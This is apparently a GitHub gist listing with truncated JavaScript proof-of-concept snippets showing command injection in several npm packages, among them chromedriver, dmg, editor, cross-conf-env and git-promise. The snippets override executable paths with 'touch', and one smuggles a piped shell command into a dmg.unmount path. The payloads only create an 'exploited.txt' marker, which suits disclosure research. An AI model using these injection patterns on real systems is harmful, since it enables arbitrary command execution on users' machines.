This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'use strict' | |
const pkg = require('topenurl'); | |
const callback = function(error) { | |
const fs = require('node:fs'); | |
let fd = fs.openSync('exploited.txt', 'a'); | |
fs.closeSync(fd); | |
}; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'use strict' | |
const pkg = require('aaptjs'); | |
/* | |
* Creates many zip files. After PREV_ZIP_SZ zip files created, | |
* it starts adding the last PREV_ZIP_SZ zip files to the new one | |
* rather than just hte previous one. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'use strict' | |
const pkg = require('@authenio/xsd-schema-validator'); | |
process.env.JAVA_HOME = 'touch'; | |
const xml = ''; | |
const schema = ''; | |
const callback = function(err, result) { | |
const fs = require('node:fs'); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'use strict' | |
const fs = require('node:fs'); | |
const path = require('node:path'); | |
const cwd = process.cwd(); | |
/* | |
* Create a local 'bower.json' file so that the program flow can | |
* continue within the pkg.sync call below. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'use strict' | |
const chromedriver = require('chromedriver'); | |
const args = ['exploited.txt']; | |
const returnPromise = false; | |
chromedriver.path = '/usr/bin/touch'; | |
// This creates a local 'exploited.txt' file. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'use strict' | |
const dmg = require('dmg'); | |
const path = '" | touch exploited.txt | echo /Volumes/ "'; | |
const callback = function() {}; | |
dmg.unmount(path, callback); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'use strict' | |
const editor = require('editor'); | |
const file = 'exploited.txt'; | |
const opts = { | |
editor: 'touch' | |
}; | |
const cb = function() {}; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'use strict' | |
const pkg = require('cross-conf-env'); | |
// This will create a local 'exploit.txt' file. | |
pkg.default(['touch', 'exploit.txt']); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'use strict' | |
const pkg = require('cross-os'); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'use strict' | |
const pkg = require('git-promise'); | |
const commandOrArgs = 'exploited.txt'; | |
const optionsOrCallback = { | |
gitExec: 'touch' | |
}; | |
const callbackMaybe = function() {}; |
OlderNewer